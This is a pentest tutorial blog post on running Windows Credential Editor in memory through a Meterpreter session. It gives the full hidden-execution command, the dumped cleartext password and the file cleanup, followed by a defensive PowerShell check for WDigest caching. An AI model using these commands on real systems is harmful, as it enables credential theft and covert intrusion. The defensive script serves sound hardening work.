Dumping Clear Text Passwords

If you haven’t heard, a tool was released a little over a year ago now, with little fanfare, that can dump the credentials of every logged-on user in clear text. It’s called mimikatz. Passing the hash is fun, but you can’t beat a good clear text password. Am I right? You can download the executable and its dependent DLL from Benjamin’s (the author’s) site, and his presentation from PHDays 2012 gives a detailed explanation of how it works. I figured I would finally check this tool out and see what it has to offer.

A little Googling around turned up a post on PaulDotCom detailing how to upload and execute the tool through a Meterpreter session. One potential problem with this method is that anti-virus can easily stop it as soon as the executable hits the disk. Mubix is currently working on implementing mimikatz’s functionality directly in the Metasploit Framework, and I think everyone looks forward to that addition.

In the meantime, there is another way to dump clear text passwords from within a Meterpreter session without the executable ever touching the disk. First, Hernan Ochoa of Amplia Security has updated his tool, Windows Credential Editor (WCE), to also dump clear text passwords. It’s currently in beta and hasn’t been added to the BackTrack repository yet, so we’ll have to download it from Amplia Security’s site directly. Next, all we need to do is use Meterpreter’s “execute” command to inject the executable directly into the memory of the remote machine and run it there to dump the passwords for us. Egyp7, one of the Metasploit Framework developers, wrote a post a couple of months ago showing exactly how to do this. Let’s look at the options for Meterpreter’s “execute”:

meterpreter > execute
Usage: execute -f file [options]

Executes a command on the remote machine.


-H        Create the process hidden from view.
-a <opt>  The arguments to pass to the command.
-c        Channelized I/O (required for interaction).
-d <opt>  The 'dummy' executable to launch when using -m.
-f <opt>  The executable command to run.
-h        Help menu.
-i        Interact with the process after creating it.
-k        Execute process on the meterpreters current desktop
-m        Execute from memory.
-s <opt>  Execute process in a given session as the session user
-t        Execute process with currently impersonated thread token

And here are our options for WCE:

root@bt:/pentest/passwords/wce/beta# wine wce.exe -h
fixme:heap:HeapSetInformation (nil) 1 (nil) 0
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa ([email protected])
Use -h for help.
-l        List logon sessions and NTLM credentials (default).
-s        Changes NTLM credentials of current logon session.
          Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.
-r        Lists logon sessions and NTLM credentials indefinitely.
          Refreshes every 5 seconds if new sessions are found.
          Optional: -r<refresh interval>.
-c        Run <cmd> in a new session with the specified NTLM credentials.
          Parameters: <cmd>.
-e        Lists logon sessions NTLM credentials indefinitely.
          Refreshes every time a logon event occurs.
-o        saves all output to a file.
          Parameters: <filename>.
-i        Specify LUID instead of use current logon session.
          Parameters: <luid>.
-d        Delete NTLM credentials from logon session.
          Parameters: <luid>.
-a        Use Addresses.
          Parameters: <addresses>
-f        Force 'safe mode'.
-g        Generate LM & NT Hash.
          Parameters: <password>.
-K        Dump Kerberos tickets to file (unix & 'windows wce' format)
-k        Read Kerberos tickets from file and insert into Windows cache
-w        Dump cleartext passwords stored by the digest authentication package
-v        verbose output.

We’re simply going to use Meterpreter’s “-H” option to create a hidden process, “-m” to execute the process from memory, and “-a” to pass WCE the arguments it needs to dump the clear text passwords (“-w”) and write them to a file (“-o”). The only thing that lands on the remote disk is that output file, which we read and then delete:

meterpreter > execute -H -m -f /pentest/passwords/wce/beta/wce.exe -a "-w -o output.txt"
Process 2900 created.
meterpreter > cat output.txt

NETWORK SERVICE\WORKGROUP:Supercalifragilisticexpialidocious
meterpreter > del output.txt

Wow, I would have never guessed that password…
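From the defender’s side, the store that WCE’s “-w” reads is the credential cache kept by the WDigest authentication package, and the practical mitigation is to stop WDigest from keeping logon passwords in LSASS at all. The PowerShell script below is an added example, not part of the original post or of WCE; it assumes the UseLogonCredential registry value that Microsoft later added with update KB2871997 (Windows 7, 8, Server 2008 R2 and 2012), which Windows 8.1 / Server 2012 R2 and later treat as disabled by default when the value is absent.

```powershell
# Added example (not from the original post): audit whether WDigest may still
# hold cleartext logon credentials in LSASS, the store that "wce.exe -w" reads.
# Assumption: the UseLogonCredential value introduced by KB2871997. Pre-8.1
# systems without the update (or with the value missing) cache cleartext
# passwords; 8.1 / 2012 R2 and later do not unless the value is set to 1.
$key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$name = 'UseLogonCredential'

function Get-WDigestCachingState {
    # Win32_OperatingSystem reports the real build, unaffected by compatibility shims.
    $osVersion = [version](Get-WmiObject Win32_OperatingSystem).Version
    $item = Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue

    if ($null -ne $item) {
        $value = [int]$item.$name
        if ($value -eq 0) {
            return "Disabled ($name = 0): WDigest does not keep cleartext passwords"
        }
        return "ENABLED ($name = $value): cleartext passwords are kept in LSASS"
    }

    # Value absent: the default depends on the OS build.
    if ($osVersion -ge [version]'6.3') {
        return "Disabled by default (Windows 8.1 / Server 2012 R2 or later, $name absent)"
    }
    return "ENABLED by default ($name absent on pre-8.1 Windows): install KB2871997 and set $name = 0"
}

function Disable-WDigestCaching {
    # Requires an elevated prompt. Sessions that were already logged on keep
    # their cached cleartext credentials until they log off or the host reboots.
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name $name -Value 0 -Type DWord
    return Get-WDigestCachingState
}

Get-WDigestCachingState
```

Run Get-WDigestCachingState across a fleet to find hosts where a memory-resident WCE or mimikatz would still recover passwords, and Disable-WDigestCaching on those that need it.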

Update: Dumping Clear Text Passwords (Revisited)